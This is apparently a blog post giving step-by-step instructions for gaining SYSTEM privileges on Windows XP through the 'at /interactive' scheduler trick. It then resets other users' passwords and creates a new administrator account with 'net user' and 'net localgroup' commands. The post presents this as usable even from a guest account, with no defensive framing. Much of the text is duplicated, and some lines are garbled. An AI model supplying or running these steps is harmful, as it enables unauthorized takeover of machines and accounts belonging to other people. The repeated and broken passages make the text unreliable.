Using simple command line tools on a machine running Windows XP we
will obtain system level privileges, and run the entire explorer
process (Desktop), and all processes that run from it have system
privileges. The system run level is higher than administrator, and has
full control of the operating system and it’s kernel. On many machines
this can be exploited even with the guest account.
Follow these steps:
1. open command prompt (Start->Run->cmd),
2. enter the following command, then press ENTER]:
at 15:25 /interactive “cmd.exe”
Lets
break down the preceding code. The “at” told the machine to run the at
command, everything after that are the operators for the command, the
important thing here, is to change the time (24 hour format) to one
minute after the time currently set on your computers clock, for
example: If your computer’s clock says it’s 4:30pm, convert this to 24
hour format (16:30) then use 16:31 as the time in the command.
When
the system clock reaches the time you set, then a new command prompt
will magically run. You’ll notice that the title bar has changed from
cmd.exe to svchost.exe (which is short for Service Host). Now that we
have our system command prompt, you may close the old one. The
difference is that this one is running with system privileges (because
it was started by the task scheduler service, which runs under the
Local System account).
3. enter the following command, then press ENTER]:
compmgmt.msc
this will open the computer management console
4. Go to local users and groups->users.
Right click on any user and select "set password".
its done now…
will obtain system level privileges, and run the entire explorer
process (Desktop), and all processes that run from it have system
privileges. The system run level is higher than administrator, and has
full control of the operating system and it’s kernel. On many machines
this can be exploited even with the guest account.
1. open command prompt (Start->Run->cmd),
2. enter the following command, then press ENTER]:
at 15:25 /interactive “cmd.exe”
Lets
break down the preceding code. The “at” told the machine to run the at
command, everything after that are the operators for the command, the
important thing here, is to change the time (24 hour format) to one
minute after the time currently set on your computers clock, for
example: If your computer’s clock says it’s 4:30pm, convert this to 24
hour format (16:30) then use 16:31 as the time in the command.
When
the system clock reaches the time you set, then a new command prompt
will magically run. You’ll notice that the title bar has changed from
cmd.exe to svchost.exe (which is short for Service Host). Now that we
have our system command prompt, you may close the old one. The
difference is that this one is running with system privileges (because
it was started by the task scheduler service, which runs under the
Local System account).
3. enter the following command, then press ENTER]:
compmgmt.msc
this will open the computer management console
4. Go to local users and groups->users.
Right click on any user and select "set password".
its done now…
if it says access denied do this
start>run>cmd
net use \\(your ip add)\IPS$ /u:Administrator
or
start>run>cmd
then use following commands
1) net user test /add (this command will make test named user)
2) net localgroup administrators test /add (this command will make test user as administrators rights)
then use following commands
1) net user test /add (this command will make test named user)
2) net localgroup administrators test /add (this command will make test user as administrators rights)
and use net user command to reset your admin. password
No comments:
Post a Comment